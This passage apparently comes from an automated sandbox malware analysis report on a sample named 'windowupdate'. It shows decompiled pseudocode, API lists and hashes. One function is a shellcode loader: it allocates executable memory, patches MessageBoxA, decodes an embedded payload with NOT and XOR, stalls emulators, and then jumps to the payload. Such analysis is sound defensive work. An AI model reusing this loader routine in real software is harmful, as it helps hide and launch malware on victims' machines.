				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				intOrPtr _v140;
				long _v148;
				void* _v156;
				struct HWND__* _v160;
				signed int _v164;
				struct HWND__* _v168;
				intOrPtr _v172;
				signed int _v176;
				struct HWND__* _v180;
				signed int _v184;
				signed int _v188;
				char _v192;
				signed int _t208;
				void* _t210;
				int _t213;
				void* _t239;
				void* _t243;
				void* _t244;
				int _t247;
				int _t251;
				int _t255;
				int _t256;
				int _t259;
				void* _t266;
				char _t323;
				void* _t325;
				int _t328;
				int _t332;
				void* _t336;
				void* _t337;
				signed int _t346;
				void* _t347;
				void* _t348;

				_t266 = __ebx;
				_t336 =  &_v192;
				memset(_t336, 0xcccccccc, 0x2f << 2);
				_t348 = _t347 + 0xc;
				_t337 = _t336 + 0x2f;
				_t208 =  *0xdf600c; // 0x71e60372
				_v8 = _t208 ^ _t346;
				_v24 = 0xdf6998;
				_v28 = 0x3e800;
				_v132 = 0xa8;
				_v131 = 0xc1;
				_v130 = 0xd3;
				_v129 = 0x97;
				_v128 = 0x13;
				_v127 = 0xba;
				_v126 = 0x79;
				_v125 = 0x46;
				_v124 = 0x9d;
				_v123 = 0x64;
				_v122 = 0x3a;
				_v121 = 0xae;
				_v120 = 0x23;
				_v119 = 0x90;
				_v118 = 0xb5;
				_v117 = 0xfc;
				_v116 = 0x83;
				_v115 = 0x78;
				_v114 = 0x2b;
				_v113 = 0x4c;
				_v112 = 0xac;
				_v111 = 0xa2;
				_v110 = 0x16;
				_v109 = 0xa;
				_v108 = 0x76;
				_v107 = 0xa6;
				_v106 = 0x54;
				_v105 = 0xd3;
				_v104 = 0xbe;
				_v103 = 0xcc;
				_v102 = 0x92;
				_v101 = 0x26;
				_v100 = 0x94;
				_v99 = 9;
				_v98 = 0x69;
				_v97 = 0xb1;
				_v96 = 0xfb;
				_v95 = 0x13;
				_v94 = 0xdc;
				_v93 = 0xb2;
				_v92 = 0x68;
				_v91 = 0x9a;
				_v90 = 0xe4;
				_v89 = 0x21;
				_v88 = 0x20;
				_v87 = 0x4c;
				_v86 = 0x88;
				_v85 = 0x43;
				_v84 = 0x8d;
				_v83 = 0xe;
				_v82 = 0x36;
				_v81 = 0x6b;
				_v80 = 0x79;
				_v79 = 0xd9;
				_v78 = 0xd1;
				_v77 = 0x58;
				_v76 = 0x44;
				_v75 = 0x4d;
				_v74 = 0xf6;
				_v73 = 0x52;
				_v72 = 0x14;
				_v71 = 0x6e;
				_v70 = 0x8a;
				_v69 = 0xd5;
				_v68 = 0x1b;
				_v67 = 0xff;
				_v66 = 0x3c;
				_v65 = 0x1c;
				_v64 = 0xd1;
				_v63 = 0xfb;
				_v62 = 0x91;
				_v61 = 0x58;
				_v60 = 0x30;
				_v59 = 0x57;
				_v58 = 4;
				_v57 = 0x8f;
				_v56 = 0x32;
				_v55 = 0xd8;
				_v54 = 0xe9;
				_v53 = 0xcd;
				_v52 = 0x46;
				_v51 = 0x90;
				_v50 = 0xee;
				_v49 = 0x94;
				_v48 = 0x63;
				_v47 = 0xbb;
				_v46 = 0xa;
				_v45 = 0xc0;
				_v44 = 0x9a;
				_v43 = 0x50;
				_v42 = 0xf1;
				_v41 = 0xa9;
				_v40 = 0xa9;
				_v39 = 0xb0;
				_v38 = 0x69;
				_v37 = 0x1d;
				_v36 = 0x85;
				_v35 = 4;
				_v34 = 0x58;
				_v33 = 0x9d;
				_t210 = VirtualAlloc(0, 0xa00000, 0x3000, 0x40); // executed
				_v140 = E00DC1520(_t210, _t348 - _t348);
				_v148 = 0;
				_v156 = MessageBoxA;
				_t213 = VirtualProtect(_v156, 0x100, 0x40,  &_v148); // executed
				E00DC1520(_t213, _t348 - _t348);
				 *((char*)(_t346 + 0xfffffffffffffff4)) =  *_v156;
				 *((char*)(_t346 + 0xbadba1)) =  *((intOrPtr*)(_v156 + (1 << 0)));
				 *((char*)(_t346 + 0xbadba1)) =  *((intOrPtr*)(_v156 + (1 << 1)));
				 *((char*)(_t346 + 0xfffffffffffffff7)) =  *((intOrPtr*)(_v156 + 3));
				 *_v156 = 0xc2;
				 *((char*)(_v156 + (1 << 0))) = 0x10;
				 *((char*)(_v156 + (1 << 1))) = 0;
				 *((char*)(_v156 + 3)) = 0x90;
				_v160 = 0;
				while(_v160 <= _v28 - 1) {
					_v164 =  !( *(_v24 + (_v28 - 1 - _v160) * 4));
					if(_v164 != 0) {
						 *((char*)(_v140 + _v160)) = _v164;
					}
					_v160 =  &(_v160->i);
				}
				_v168 = 0;
				while(1) {
					__eflags = _v168 - 0xeac40;
					if(_v168 >= 0xeac40) {
						break;
					}
					_v180 = 0;
					while(1) {
						__eflags = _v180 - 0x3ff;
						if(_v180 >= 0x3ff) {
							break;
						}
						_t256 = MessageBoxA(0, "1", "1", 1);
						__eflags = _t348 - _t348;
						E00DC1520(_t256, _t348 - _t348);
						_v172 = _v28;
						__eflags = _v28 - 0x1f9;
						if(_v28 >= 0x1f9) {
							_v176 = 0x64;
						} else {
							_t259 = MessageBoxA(0, "1", "1", 1);
							__eflags = _t348 - _t348;
							E00DC1520(_t259, _t348 - _t348);
							_v176 = 0;
						}
						_t332 =  &(_v180->i);
						__eflags = _t332;
						_v180 = _t332;
					}
					_v168 =  &(_v168->i);
				}
				_v184 = 0;
				while(1) {
					__eflags = _v184 - _v172;
					if(_v184 >= _v172) {
						break;
					}
					_t247 = MessageBoxA(0, "1", "1", 1);
					__eflags = _t348 - _t348;
					E00DC1520(_t247, _t348 - _t348);
					asm("cdq");
					_v188 = _v184 % _v176;
					__eflags = _v184 - 0x1000000;
					if(_v184 != 0x1000000) {
						_t255 = _v140 + _v184;
						__eflags = _t255;
						 *_t255 =  *(_v140 + _v184) ^  *(_t346 + _v188 - 0x80);
					}
					_t251 = MessageBoxA(0, "1", "1", 2);
					__eflags = _t348 - _t348;
					E00DC1520(_t251, _t348 - _t348);
					_t328 = _v184 + 1;
					__eflags = _t328;
					_v184 = _t328;
				}
				_v192 = _v140;
				 *_v156 =  *((intOrPtr*)(_t346 + 0xfffffffffffffff4));
				 *((char*)(_v156 + (1 << 0))) =  *((intOrPtr*)(_t346 + 0xbadba1));
				 *((char*)(_v156 + (1 << 1))) =  *((intOrPtr*)(_t346 + 0xbadba1));
				_t323 =  *((intOrPtr*)(_t346 + 0xfffffffffffffff7));
				 *((char*)(_v156 + 3)) = _t323;
				_t341 = _t348;
				_t239 = _v192();
				__eflags = _t348 - _t348;
				E00DC1520(_t239, _t348 - _t348);
				while(1) {
					__eflags = 1;
					if(1 == 0) {
						break;
					}
					_t341 = _t348;
					Sleep(0x320); // executed
					__eflags = _t348 - _t348;
					E00DC1520(1, _t348 - _t348);
				}
				E00DC14C0(_t346, 0xdbfdc0);
				_t243 = 1;
				_t325 = _t323;
				_t244 = E00D47280(_t243, _t266, _v8 ^ _t346, _t325, _t337, _t341);
				__eflags = _t346 - _t348 + 0xbc;
				return E00DC1520(_t244, _t346 - _t348 + 0xbc);
			}











































































































































                      0x00dbf830
                      0x00dbf83b
                      0x00dbf84b
                      0x00dbf84b
                      0x00dbf84b
                      0x00dbf84d
                      0x00dbf854
                      0x00dbf857
                      0x00dbf85e
                      0x00dbf865
                      0x00dbf869
                      0x00dbf86d
                      0x00dbf871
                      0x00dbf875
                      0x00dbf879
                      0x00dbf87d
                      0x00dbf881
                      0x00dbf885
                      0x00dbf889
                      0x00dbf88d
                      0x00dbf891
                      0x00dbf895
                      0x00dbf899
                      0x00dbf89d
                      0x00dbf8a1
                      0x00dbf8a5
                      0x00dbf8a9
                      0x00dbf8ad
                      0x00dbf8b1
                      0x00dbf8b5
                      0x00dbf8b9
                      0x00dbf8bd
                      0x00dbf8c1
                      0x00dbf8c5
                      0x00dbf8c9
                      0x00dbf8cd
                      0x00dbf8d1
                      0x00dbf8d5
                      0x00dbf8d9
                      0x00dbf8dd
                      0x00dbf8e1
                      0x00dbf8e5
                      0x00dbf8e9
                      0x00dbf8ed
                      0x00dbf8f1
                      0x00dbf8f5
                      0x00dbf8f9
                      0x00dbf8fd
                      0x00dbf901
                      0x00dbf905
                      0x00dbf909
                      0x00dbf90d
                      0x00dbf911
                      0x00dbf915
                      0x00dbf919
                      0x00dbf91d
                      0x00dbf921
                      0x00dbf925
                      0x00dbf929
                      0x00dbf92d
                      0x00dbf931
                      0x00dbf935
                      0x00dbf939
                      0x00dbf93d
                      0x00dbf941
                      0x00dbf945
                      0x00dbf949
                      0x00dbf94d
                      0x00dbf951
                      0x00dbf955
                      0x00dbf959
                      0x00dbf95d
                      0x00dbf961
                      0x00dbf965
                      0x00dbf969
                      0x00dbf96d
                      0x00dbf971
                      0x00dbf975
                      0x00dbf979
                      0x00dbf97d
                      0x00dbf981
                      0x00dbf985
                      0x00dbf989
                      0x00dbf98d
                      0x00dbf991
                      0x00dbf995
                      0x00dbf999
                      0x00dbf99d
                      0x00dbf9a1
                      0x00dbf9a5
                      0x00dbf9a9
                      0x00dbf9ad
                      0x00dbf9b1
                      0x00dbf9b5
                      0x00dbf9b9
                      0x00dbf9bd
                      0x00dbf9c1
                      0x00dbf9c5
                      0x00dbf9c9
                      0x00dbf9cd
                      0x00dbf9d1
                      0x00dbf9d5
                      0x00dbf9d9
                      0x00dbf9dd
                      0x00dbf9e1
                      0x00dbf9e5
                      0x00dbf9e9
                      0x00dbf9ed
                      0x00dbf9f1
                      0x00dbfa05
                      0x00dbfa12
                      0x00dbfa18
                      0x00dbfa27
                      0x00dbfa44
                      0x00dbfa4c
                      0x00dbfa6a
                      0x00dbfa87
                      0x00dbfaa2
                      0x00dbfabf
                      0x00dbfad1
                      0x00dbfae3
                      0x00dbfaf4
                      0x00dbfb06
                      0x00dbfb0a
                      0x00dbfb25
                      0x00dbfb47
                      0x00dbfb54
                      0x00dbfb68
                      0x00dbfb68
                      0x00dbfb1f
                      0x00dbfb1f
                      0x00dbfb6c
                      0x00dbfb76
                      0x00dbfb76
                      0x00dbfb80
                      0x00000000
                      0x00000000
                      0x00dbfb86
                      0x00dbfba1
                      0x00dbfba1
                      0x00dbfbab
                      0x00000000
                      0x00000000
                      0x00dbfbbd
                      0x00dbfbc3
                      0x00dbfbc5
                      0x00dbfbcd
                      0x00dbfbd3
                      0x00dbfbda
                      0x00dbfc05
                      0x00dbfbdc
                      0x00dbfbec
                      0x00dbfbf2
                      0x00dbfbf4
                      0x00dbfbf9
                      0x00dbfbf9
                      0x00dbfb98
                      0x00dbfb98
                      0x00dbfb9b
                      0x00dbfb9b
                      0x00dbfc1a
                      0x00dbfc1a
                      0x00dbfc25
                      0x00dbfc40
                      0x00dbfc46
                      0x00dbfc4c
                      0x00000000
                      0x00000000
                      0x00dbfc62
                      0x00dbfc68
                      0x00dbfc6a
                      0x00dbfc75
                      0x00dbfc7c
                      0x00dbfc82
                      0x00dbfc8c
                      0x00dbfcb0
                      0x00dbfcb0
                      0x00dbfcb6
                      0x00dbfcb6
                      0x00dbfcc8
                      0x00dbfcce
                      0x00dbfcd0
                      0x00dbfc37
                      0x00dbfc37
                      0x00dbfc3a
                      0x00dbfc3a
                      0x00dbfce0
                      0x00dbfd0c
                      0x00dbfd29
                      0x00dbfd44
                      0x00dbfd5d
                      0x00dbfd61
                      0x00dbfd64
                      0x00dbfd66
                      0x00dbfd6c
                      0x00dbfd6e
                      0x00dbfd73
                      0x00dbfd78
                      0x00dbfd7a
                      0x00000000
                      0x00000000
                      0x00dbfd7c
                      0x00dbfd83
                      0x00dbfd89
                      0x00dbfd8b
                      0x00dbfd8b
                      0x00dbfd9c
                      0x00dbfda1
                      0x00dbfda2
                      0x00dbfdaa
                      0x00dbfdb5
                      0x00dbfdbf

                      APIs
                      • VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000040,?), ref: 00DBFA05
                      • VirtualProtect.KERNEL32(?,00000100,00000040,00000000), ref: 00DBFA44
                      • MessageBoxA.USER32 ref: 00DBFBBD
                      • MessageBoxA.USER32 ref: 00DBFBEC
                      • MessageBoxA.USER32 ref: 00DBFC62
                      • MessageBoxA.USER32 ref: 00DBFCC8
                      • Sleep.KERNEL32(00000320), ref: 00DBFD83
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00DBFD9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Message$Virtual$AllocCheckProtectSleepStackVars@8
                      • String ID: $!$#$&$+$0$2$6$:$<$C$D$F$F$L$L$M$P$R$T$W$X$X$X$c$d$d$h$i$i$k$n$v$x$y$y
                      • API String ID: 657854547-2692607833
                      • Opcode ID: a2ec57802a7d9ab294efcf4891c3954bdff9c0c457a0315e69cafee651194066
                      • Instruction ID: cd122aaa8ad8fa5fdb6da36c43526885a630c06d1e26384bdaf0d1e91ffe9442
                      • Opcode Fuzzy Hash: a2ec57802a7d9ab294efcf4891c3954bdff9c0c457a0315e69cafee651194066
                      • Instruction Fuzzy Hash: 3B026E20D087D9CEDB218BBC88447DDBF71AB12324F0842D8E5A96B3D2C7B54985CB66
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DA8BF0 Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 321timememoryCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 48 da8bf0-da8bfc 49 da8c2a-da8c35 48->49 50 da8bfe-da8c17 call db2b80 48->50 52 da8c42-da8c46 49->52 53 da8c37-da8c3f 49->53 57 da8c19-da8c22 50->57 58 da8c24-da8c27 50->58 55 da8c48-da8c4f 52->55 56 da8c51 52->56 53->52 59 da8c58-da8c7b call da0990 55->59 56->59 57->49 58->49 62 da8c7d-da8c7f 59->62 63 da8c84-da8c94 call da5110 59->63 64 da8faa-da8fad 62->64 67 da8cc9 63->67 68 da8c96-da8cc7 call da5110 call d89580 call da5140 63->68 70 da8cd0-da8cf4 call da50b0 call da5090 call da8bc0 67->70 68->70 82 da8d0d-da8d32 call da50f0 call da0990 70->82 83 da8cf6-da8d08 call da50d0 70->83 90 da8d4a-da8d75 call da50f0 call d93d90 82->90 91 da8d34-da8d45 call da50d0 82->91 83->64 98 da8d8d-da8d96 90->98 99 da8d77-da8d88 call da50d0 90->99 91->64 101 da8d98-da8d9c 98->101 102 da8e09-da8e1f call da5110 98->102 99->64 105 da8d9e-da8da4 101->105 106 da8e04 101->106 112 da8e21-da8e41 call da5110 call d89580 102->112 113 da8e57 102->113 109 da8dbd-da8dec call da50f0 call d93d90 105->109 110 da8da6-da8db8 call da50d0 105->110 107 da8f99-da8fa7 call da50d0 106->107 107->64 109->106 127 da8dee-da8dff call da50d0 109->127 110->64 129 da8e46-da8e55 call da5140 112->129 117 da8e5e-da8e82 call da50b0 call da5090 call da8bc0 113->117 137 da8ea3-da8ed7 call da50f0 * 2 call d93d90 117->137 138 da8e84-da8e9e call da50d0 * 2 117->138 127->64 129->117 149 da8ed9-da8ef2 call da50d0 * 2 137->149 150 da8ef7-da8efb 137->150 138->64 149->64 152 da8efd-da8f27 call da50f0 call da0a90 150->152 153 da8f46-da8f74 call da50f0 call da0a90 150->153 165 da8f29-da8f42 call da50d0 * 2 152->165 166 da8f44 152->166 167 da8f91-da8f94 call da50d0 153->167 168 da8f76-da8f8f call da50d0 * 2 153->168 165->64 166->167 167->107 168->64
                      C-Code - Quality: 100%
                      			E00DA8BF0(intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				signed int _t130;
				void* _t133;
				void* _t140;
				void* _t144;
				void* _t149;
				void* _t178;
				intOrPtr _t179;
				intOrPtr _t198;
				intOrPtr _t202;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t275;
				void* _t276;

				if(_a20 > 0) {
					_t202 = E00DB2B80(_a16, _a20);
					_t272 = _t272 + 8;
					_v28 = _t202;
					if(_v28 >= _a20) {
						_a20 = _v28;
					} else {
						_a20 = _v28 + 1;
					}
				}
				_v8 = 0;
				if(_a32 == 0) {
					_a32 =  *((intOrPtr*)( *_a4 + 8));
				}
				if(_a36 == 0) {
					_v32 = 1;
				} else {
					_v32 = 9;
				}
				_t130 = E00DA0990(_a32, _v32, _a16, _a20, 0, 0);
				_t273 = _t272 + 0x18;
				_v20 = _t130;
				if(_v20 != 0) {
					_t133 = E00DA5110(_v20 << 1);
					_t274 = _t273 + 4;
					if(_t133 == 0) {
						_v36 = 0;
					} else {
						_t198 = E00DA5140(E00D89580(E00DA5110(_v20 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\lcmapstringa.cpp", 0x6a), 0xdddd);
						_t274 = _t274 + 0x1c;
						_v36 = _t198;
					}
					E00DA5090( &_v12,  *((intOrPtr*)(E00DA50B0( &_v84, _v36))));
					if((E00DA8BC0( &_v12) & 0x000000ff) != 0) {
						_t140 = E00DA0990(_a32, 1, _a16, _a20, E00DA50F0( &_v12), _v20);
						_t275 = _t274 + 0x18;
						if(_t140 != 0) {
							_v8 = E00D93D90(_a8, _a12, E00DA50F0( &_v12), _v20, 0, 0, 0, 0, 0);
							if(_v8 != 0) {
								if((_a12 & 0x00000400) == 0) {
									_v24 = _v8;
									_t144 = E00DA5110(_v24 << 1);
									_t276 = _t275 + 4;
									if(_t144 == 0) {
										_v40 = 0;
									} else {
										_t178 = E00D89580(E00DA5110(_v24 << 1), 2, "minkernel\\crts\\ucrt\\src\\appcrt\\locale\\lcmapstringa.cpp", 0xa3); // executed
										_t179 = E00DA5140(_t178, 0xdddd);
										_t276 = _t276 + 0x1c;
										_v40 = _t179;
									}
									E00DA5090( &_v16,  *((intOrPtr*)(E00DA50B0( &_v88, _v40))));
									if((E00DA8BC0( &_v16) & 0x000000ff) != 0) {
										_t149 = E00DA50F0( &_v16);
										_v8 = E00D93D90(_a8, _a12, E00DA50F0( &_v12), _v20, _t149, _v24, 0, 0, 0);
										if(_v8 != 0) {
											if(_a28 != 0) {
												_v8 = E00DA0A90(_a32, 0, E00DA50F0( &_v16), _v24, _a24, _a28, 0, 0);
												if(_v8 != 0) {
													L40:
													E00DA50D0( &_v16);
													L41:
													_v80 = _v8;
													E00DA50D0( &_v12);
													return _v80;
												}
												_v76 = _v8;
												E00DA50D0( &_v16);
												E00DA50D0( &_v12);
												return _v76;
											}
											_v8 = E00DA0A90(_a32, 0, E00DA50F0( &_v16), _v24, 0, 0, 0, 0);
											if(_v8 != 0) {
												goto L40;
											}
											_v72 = _v8;
											E00DA50D0( &_v16);
											E00DA50D0( &_v12);
											return _v72;
										}
										_v68 = _v8;
										E00DA50D0( &_v16);
										E00DA50D0( &_v12);
										return _v68;
									} else {
										_v64 = 0;
										E00DA50D0( &_v16);
										E00DA50D0( &_v12);
										return _v64;
									}
								}
								if(_a28 == 0) {
									L26:
									goto L41;
								}
								if(_v8 <= _a28) {
									_v8 = E00D93D90(_a8, _a12, E00DA50F0( &_v12), _v20, _a24, _a28, 0, 0, 0);
									if(_v8 != 0) {
										goto L26;
									}
									_v60 = _v8;
									E00DA50D0( &_v12);
									return _v60;
								}
								_v56 = 0;
								E00DA50D0( &_v12);
								return _v56;
							}
							_v52 = _v8;
							E00DA50D0( &_v12);
							return _v52;
						}
						_v48 = _v8;
						E00DA50D0( &_v12);
						return _v48;
					} else {
						_v44 = 0;
						E00DA50D0( &_v12);
						return _v44;
					}
				} else {
					return 0;
				}
			}






































                      0x00da8bfc
                      0x00da8c06
                      0x00da8c0b
                      0x00da8c0e
                      0x00da8c17
                      0x00da8c27
                      0x00da8c19
                      0x00da8c1f
                      0x00da8c1f
                      0x00da8c17
                      0x00da8c2a
                      0x00da8c35
                      0x00da8c3f
                      0x00da8c3f
                      0x00da8c46
                      0x00da8c51
                      0x00da8c48
                      0x00da8c48
                      0x00da8c48
                      0x00da8c6c
                      0x00da8c71
                      0x00da8c74
                      0x00da8c7b
                      0x00da8c8a
                      0x00da8c8f
                      0x00da8c94
                      0x00da8cc9
                      0x00da8c96
                      0x00da8cbc
                      0x00da8cc1
                      0x00da8cc4
                      0x00da8cc4
                      0x00da8ce2
                      0x00da8cf4
                      0x00da8d28
                      0x00da8d2d
                      0x00da8d32
                      0x00da8d6e
                      0x00da8d75
                      0x00da8d96
                      0x00da8e0c
                      0x00da8e15
                      0x00da8e1a
                      0x00da8e1f
                      0x00da8e57
                      0x00da8e21
                      0x00da8e41
                      0x00da8e4a
                      0x00da8e4f
                      0x00da8e52
                      0x00da8e52
                      0x00da8e70
                      0x00da8e82
                      0x00da8eb0
                      0x00da8ed0
                      0x00da8ed7
                      0x00da8efb
                      0x00da8f6d
                      0x00da8f74
                      0x00da8f91
                      0x00da8f94
                      0x00da8f99
                      0x00da8f9c
                      0x00da8fa2
                      0x00000000
                      0x00da8fa7
                      0x00da8f79
                      0x00da8f7f
                      0x00da8f87
                      0x00000000
                      0x00da8f8c
                      0x00da8f20
                      0x00da8f27
                      0x00000000
                      0x00da8f44
                      0x00da8f2c
                      0x00da8f32
                      0x00da8f3a
                      0x00000000
                      0x00da8f3f
                      0x00da8edc
                      0x00da8ee2
                      0x00da8eea
                      0x00000000
                      0x00da8e84
                      0x00da8e84
                      0x00da8e8e
                      0x00da8e96
                      0x00000000
                      0x00da8e9b
                      0x00da8e82
                      0x00da8d9c
                      0x00da8e04
                      0x00000000
                      0x00da8e04
                      0x00da8da4
                      0x00da8de5
                      0x00da8dec
                      0x00000000
                      0x00000000
                      0x00da8df1
                      0x00da8df7
                      0x00000000
                      0x00da8dfc
                      0x00da8da6
                      0x00da8db0
                      0x00000000
                      0x00da8db5
                      0x00da8d7a
                      0x00da8d80
                      0x00000000
                      0x00da8d85
                      0x00da8d37
                      0x00da8d3d
                      0x00000000
                      0x00da8cf6
                      0x00da8cf6
                      0x00da8d00
                      0x00000000
                      0x00da8d05
                      0x00da8c7d
                      0x00000000
                      0x00da8c7d

                      APIs
                      • __wcstombs_l.LIBCMTD ref: 00DA8CB3
                      • __MarkAllocaS.LIBCMTD ref: 00DA8CBC
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00DA8CD7
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00DA8CE2
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA8D00
                        • Part of subcall function 00DA0990: MultiByteToWideChar.KERNEL32(00000000,CCCCCCCC,?,?,?,?,?,?,00000000,CCCCCCCC), ref: 00DA09C3
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA8D3D
                      • std::_Mutex::_Lock.LIBCPMTD ref: 00DA8D80
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp, xrefs: 00DA8C9D, 00DA8E2B
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiWide__wcstombs_l
                      • String ID: minkernel\crts\ucrt\src\appcrt\locale\lcmapstringa.cpp
                      • API String ID: 3719586419-1038314930
                      • Opcode ID: 36768c68e881182292ac67770d7bc3b3e58ec5328f5b76f338590e01d195dacc
                      • Instruction ID: 025c6da9d4995e4cfd97fc923df114fd58e257a257c696d29fd7f8275215074a
                      • Opcode Fuzzy Hash: 36768c68e881182292ac67770d7bc3b3e58ec5328f5b76f338590e01d195dacc
                      • Instruction Fuzzy Hash: ACC13AB1900209EFCB04EF94D8A1BEEB7B5EF55304F244558F906AB285DB70AE44DBB4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3CB60 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 193windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 84%
                      			E00D3CB60(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v30;
				char _v32;
				MSG* _v40;
				struct tagMSG _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				void _v88;
				short _t49;
				MSG* _t52;
				struct HWND__* _t54;
				void* _t56;
				intOrPtr _t58;
				int _t63;
				long _t65;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t82;
				MSG* _t98;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;

				_t78 = __ebx;
				_push(__ecx);
				_t102 =  &_v88;
				memset( &_v88, 0xcccccccc, 0x15 << 2);
				_t112 = _t111 + 0xc;
				_pop(_t82);
				_v8 = _t82;
				_v12 = E00DC1520(GetCommandLineA(), _t112 - _t112);
				_t106 = _t112;
				__imp__CoInitialize(0); // executed
				E00DC1520(_t47, _t112 - _t112);
				_v16 = 0;
				_v24 = 1;
				_t49 =  *((intOrPtr*)("-/")); // 0x2f2d
				_v32 = _t49;
				_t83 =  *0xdefd96; // 0x0
				_v30 = _t83;
				E00DBF830(__ebx, _t102 + 0x15, _t112); // executed
				_t98 =  &_v32;
				_t52 = E00D33F80(_t83, _t106, _v12, _t98);
				_t113 = _t112 + 8;
				_v40 = _t52;
				while(_v40 != 0) {
					_t71 = E00D34020(_t106, _v40, "UnregServer");
					_t113 = _t113 + 8;
					if(_t71 != 0) {
						_t98 = _v40;
						_t72 = E00D34020(_t106, _t98, "RegServer");
						_t113 = _t113 + 8;
						__eflags = _t72;
						if(_t72 != 0) {
							_t83 = _v40;
							_t52 = E00D33F80(_v40, _t106, _v40,  &_v32);
							_t113 = _t113 + 8;
							_v40 = _t52;
							continue;
						}
						_v20 = E00D3D160(_v8);
						__eflags = _v20;
						if(__eflags >= 0) {
							_v20 = E00D3D200(_t78, _v8, _t106, __eflags, 1, 0);
						}
						_t54 = 0;
						goto L28;
					} else {
						_v20 = E00D3D190(_t78, _v8, _t106, 1, 0);
						if(_v20 >= 0) {
